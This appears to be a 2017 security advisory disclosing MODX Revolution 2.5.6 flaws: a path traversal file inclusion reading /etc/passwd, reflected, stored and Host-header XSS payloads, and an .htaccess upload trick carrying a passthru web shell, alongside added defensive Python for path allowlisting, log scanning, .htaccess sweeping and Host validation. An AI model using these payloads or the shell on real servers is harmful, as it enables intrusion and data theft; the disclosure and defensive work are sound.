MODX Revolution CMS 2.5.6


Modx Revolution is a great CMS: open source, UX friendly and easy to use. However, in version 2.5.6 and lower we have identified multiple vulnerabilities.

Unauthenticated Local File Inclusion

The attacker is able to include and execute arbitrary files on the web server due to insufficient validation of the user-supplied argument action. However, this vulnerability is exploitable only when the server uses PHP 5.3.3, which is the minimal version of PHP supported by Modx Revolution 2.5.6 (the %00 in the payload relies on null-byte truncation of file paths, which later PHP versions no longer allow).

Example request with payload:

GET /setup/index.php?action=../../../../../../../etc/passwd%00 HTTP/1.1
Host: localhost
Connection: close
Content-Length: 0
Cookie: PHPSESSID=20410ami2ep7vpa0bt33bcv464
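The fix for this class of bug is to never build an include path from the raw parameter. The following Python function is an added example written for this article, not MODX code; the controller directory and the set of action names are assumptions. It maps the action parameter to a file only when the value is a short identifier on an allowlist, and as defence in depth also confirms that the resolved path stays under the controller directory. The traversal payload from the request above fails at the very first check, so the filesystem never sees attacker-controlled path components.

```python
import os
import re
from urllib.parse import unquote

# Assumed paths and action names for the example; MODX's real setup
# controllers are not reproduced here.
SETUP_ROOT = "/var/www/html/setup/controllers"
ALLOWED_ACTIONS = {"welcome", "language", "database", "options", "install"}

# A valid action is a short lowercase identifier: no dots, slashes or NUL.
ACTION_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")


def resolve_setup_action(action):
    """Map a user-supplied ?action= value to a controller file, or None.

    Order of checks:
      1. type and NUL-byte check (NUL is what the %00 payload decodes to);
      2. syntactic check against ACTION_RE;
      3. allowlist membership;
      4. the resolved absolute path must still be inside SETUP_ROOT.
    Steps 1-3 are sufficient on their own; step 4 guards against a future
    change that relaxes the regex.
    """
    if not isinstance(action, str) or "\x00" in action:
        return None
    if not ACTION_RE.fullmatch(action):
        return None
    if action not in ALLOWED_ACTIONS:
        return None
    path = os.path.realpath(os.path.join(SETUP_ROOT, action + ".php"))
    root = os.path.realpath(SETUP_ROOT) + os.sep
    if not path.startswith(root):
        return None
    return path


if __name__ == "__main__":
    # The advisory's payload, URL-decoded as the web server would deliver it.
    payload = unquote("../../../../../../../etc/passwd%00")
    print("payload ->", resolve_setup_action(payload))      # None
    print("database ->", resolve_setup_action("database"))  # controller path
```

The same pattern applies to any "controller name from the query string" dispatch: resolve through a fixed mapping, never through string concatenation.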


Multiple Unauthenticated XSSs

The attacker is able to trigger reflected XSS by injecting payloads into several fields on the setup page.

GET /setup/index.php?action=database&database_type="><script>alert(1)<script> HTTP/1.1
Host: localhost
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Cookie: modx_setup_language=en; PHPSESSID=20410ami2ep7vpa0bt33bcv464
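Both the file inclusion attempt and the reflected XSS attempts from the two sections above leave distinctive traces in the web server access log, which is where a defender would look first after the disclosure. The script below is an added example for this article (not part of the advisory or of MODX); it parses Apache combined-format lines, URL-decodes the query string twice so double-encoded payloads are not missed, and flags traversal or NUL bytes aimed at /setup/ plus common reflected-XSS markers. The log lines are constructed to mirror the requests shown above; the addresses, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines modelled on this advisory's requests.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2017:15:40:01 +0200] "GET /setup/index.php?action=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1834 "-" "curl/7.52.1"
203.0.113.7 - - [10/Apr/2017:15:41:13 +0200] "GET /setup/index.php?action=database&database_type=%22%3E%3Cscript%3Ealert(1)%3Cscript%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Apr/2017:15:42:55 +0200] "GET /setup/index.php?action=database&database_type=mysql HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Apr/2017:15:43:10 +0200] "GET /index.php?id=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

XSS_MARKERS = ("<script", "onload=", "onerror=", '"><', "javascript:")


def classify_request(target):
    """Return finding labels for one request target (path plus query string)."""
    findings = []
    path, _, query = target.partition("?")
    # Decode twice: %2500 and %252e%252e%252f style double encoding would
    # otherwise slip past a single decode.
    decoded = unquote_plus(unquote_plus(query))
    if path.startswith("/setup/"):
        if "\x00" in decoded or "../" in decoded or "..\\" in decoded:
            findings.append("setup-lfi")
    lowered = decoded.lower()
    if any(marker in lowered for marker in XSS_MARKERS):
        findings.append("reflected-xss")
    return findings


def scan_log(text):
    """Yield (client ip, request target, labels) for every suspicious line."""
    alerts = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        labels = classify_request(match.group("target"))
        if labels:
            alerts.append((match.group("ip"), match.group("target"), labels))
    return alerts


if __name__ == "__main__":
    for ip, target, labels in scan_log(SAMPLE_LOG):
        print(ip, labels, target)
```

Note that a 200 status on the LFI line is not by itself proof of a successful read; the response size compared with a normal setup page is the better indicator, and on PHP newer than 5.3.3 the request fails regardless.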


Authenticated Code Execution

A user with file upload permissions is able to execute arbitrary server code. The CMS blocks file extensions like .php or .exe; however, a file with the extension .htaccess is allowed. Therefore, the user is able to upload a file named .htaccess into a specified folder. This file can contain PHP code, which is appended to every requested file with the extension .php in the specified folder.

Example scenario:
1, The attacker logs into Modx Revolution
2, The attacker uploads a file named .htaccess with the following content:

php_value auto_prepend_file .htaccess
php_value output_buffering 1

###### SHELL ###### <?php ob_clean(); if ($_GET['c'] != '') { passthru($_GET['c']." 

3, The attacker then visits the URL http://localhost/?c=ls%20-al and gets the following response:

total 29252
drwxrwxrwx 2 root root        0 Apr 10 15:45 .
drwxrwxrwx 2 root root        0 Apr  7 13:51 ..
-rwxrwxrwx 1 root root      244 Apr 10 15:44 .htaccess
drwxrwxrwx 2 root root        0 Mar 29 11:53 assets
-rwxrwxrwx 1 root root      294 Mar 29 11:53 config.core.php
drwxrwxrwx 2 root root        0 Mar 29 11:50 connectors
drwxrwxrwx 2 root root        0 Mar 29 11:53 core
-rwxrwxrwx 1 root root   198719 Mar 23 16:24 dump.sql
-rwxrwxrwx 1 root root     3441 Mar 28 08:42 ht.access
-rwxrwxrwx 1 root root     1922 Mar 28 08:42 index.php
drwxrwxrwx 2 root root        0 Mar 29 11:50 manager
drwxrwxrwx 2 root root        0 Apr  3 11:13 setup
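Two defensive controls follow from this scenario: the upload filter should be an allowlist of file names rather than a blocklist of extensions (which is how .htaccess slipped through), and an incident responder should be able to sweep a web root for .htaccess or .user.ini files that carry PHP directives. The code below is an added example for this article, not MODX's upload code; the allowed extensions are an assumption, and the demo builds a throwaway web root under a temporary directory with one benign and one constructed malicious .htaccess holding the two directives shown in the scenario.

```python
import os
import re
import tempfile

# Assumed media policy for the example; tighten to what the site really needs.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# One alphanumeric-led base name, exactly one extension. Dotfiles such as
# .htaccess, path separators, NUL bytes and double extensions all fail here.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,99}\.([A-Za-z0-9]{1,5})$")


def is_safe_upload_name(name):
    """Allowlist check for an upload file name."""
    match = SAFE_NAME_RE.fullmatch(name or "")
    return bool(match) and match.group(1).lower() in ALLOWED_EXTENSIONS


# Directives that let a per-directory config change how PHP runs in that
# directory, inject code into every script, or map new extensions to PHP.
SUSPICIOUS_RE = re.compile(
    r"^\s*(?:php_value|php_flag|php_admin_value|php_admin_flag|"
    r"AddHandler|AddType|SetHandler)\b"
    r"|auto_(?:prepend|append)_file"
    r"|<\?php",
    re.IGNORECASE | re.MULTILINE,
)


def scan_for_htaccess(root):
    """Walk root and return [(path, [matched snippets])] for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname not in (".htaccess", ".user.ini"):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with open(full, "r", errors="replace") as fh:
                    content = fh.read()
            except OSError:
                continue  # unreadable file: report separately in real use
            hits = [m.group(0) for m in SUSPICIOUS_RE.finditer(content)]
            if hits:
                findings.append((full, hits))
    return findings


def demo():
    """Build a constructed web root and return the scan result for it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    uploads = os.path.join(root, "assets", "uploads")
    os.makedirs(uploads)
    # Benign site-level rewrite rules: must not be flagged.
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\nRewriteRule ^(.*)$ index.php?q=$1 [L,QSA]\n")
    # Constructed upload-directory file carrying the directives from the
    # scenario above (only the directive lines are needed for detection).
    with open(os.path.join(uploads, ".htaccess"), "w") as fh:
        fh.write("php_value auto_prepend_file .htaccess\n"
                 "php_value output_buffering 1\n")
    return scan_for_htaccess(root)


if __name__ == "__main__":
    for path, hits in demo():
        print(path, hits)
```

The regex is deliberately broad: on a production web root a hit is a prompt to read the file, not a verdict, since legitimate .htaccess files sometimes set php_value for upload limits.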


Authenticated Stored XSS

A user with resource edit permissions can inject an XSS payload into the title of any post. This malicious payload will be triggered for every user who visits this post.

Example request, which creates a post with a malicious pagetitle:

POST /connectors/index.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 3823
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfuNRFVB7kulIsnU4
Cookie: PHPSESSID=vicnm3b9laomhm7pllfgnbdf95

Content-Disposition: form-data; name="pagetitle"

Content-Disposition: form-data; name="longtitle"

Content-Disposition: form-data; name="description"


When a victim (authenticated or unauthenticated) visits this post, an alert with the current domain is triggered.


Unauthenticated Reflected XSS via HOST header

The attacker is able to trigger XSS by injecting a payload into the HOST header. However, the likelihood of this attack is minimal, because it is hard to exploit. Exploitation is possible via a cache poisoning technique, for example.

Example request with payload:

GET / HTTP/1.1
Host: localhost"<svg onload=alert(1)>
Connection: close
Content-Length: 0
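The underlying mistake is treating the Host header as trusted data. The usual mitigation is to validate it against a configured allowlist before it reaches a template, a redirect or a cache key. The following Python is an added example for this article and not MODX code; the trusted host names are assumptions. It normalises the header (case, optional port, bracketed IPv6 literal), rejects anything that is not a syntactically valid host, and only then compares against the allowlist, so the payload from the request above is refused before any output is generated.

```python
import ipaddress
import re

# Assumed allowlist; in a real deployment this comes from configuration.
TRUSTED_HOSTS = {"localhost", "example.com", "www.example.com"}

# RFC 1123 style labels: letters, digits and hyphens only, dot separated.
# Quotes, angle brackets, spaces and slashes cannot match.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$"
)


def parse_host_header(header):
    """Return (host, port or None) for a well-formed Host header, else None."""
    if not header or len(header) > 255:
        return None
    value = header.strip().lower()
    if value.startswith("["):
        # IPv6 literal such as [::1]:8080
        end = value.find("]")
        if end == -1:
            return None
        host, rest = value[1:end], value[end + 1:]
        try:
            ipaddress.IPv6Address(host)
        except ValueError:
            return None
    else:
        host, sep, port_str = value.partition(":")
        rest = sep + port_str
        if not HOSTNAME_RE.fullmatch(host):
            return None
    port = None
    if rest:
        if not rest.startswith(":") or not rest[1:].isdigit():
            return None
        port = int(rest[1:])
        if not 1 <= port <= 65535:
            return None
    return host, port


def is_trusted_host(header):
    """True only when the header parses cleanly and names an allowlisted host."""
    parsed = parse_host_header(header)
    return parsed is not None and parsed[0] in TRUSTED_HOSTS


if __name__ == "__main__":
    for candidate in ("localhost", "localhost:8080", 'localhost"<svg onload=alert(1)>'):
        print(repr(candidate), "->", is_trusted_host(candidate))
```

Because the check happens before the value is used anywhere, a reverse proxy or cache in front of the application cannot be used to store a page rendered with an attacker-chosen host name.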



Modx Revolution 2.5.7 contains all mentioned patches, so it is recommended to update to the latest version.

Report timeline

29.3.2017 Vendor informed about mentioned vulnerabilities
21.4.2017 Vendor released new version of Modx Revolution with fixed vulnerabilities
26.4.2017 Disclosed to public
18.5.2017 Assigned CVEs


These vulnerabilities were discovered by Tomas Melicher from Citadelo.


About the author

Tomáš Melicher
Ethical hacker
I started to work as a web developer in big projects for government and financial institutions. When developing a particular software, I always asked myself “what will happen, when somebody tries to break it”. And this approach is the reason why I work at Citadelo at the moment, where I can do these kinds of things on a daily basis. Apart from hacking banks and other institutions, I can be seen playing table tennis or doing street workouts.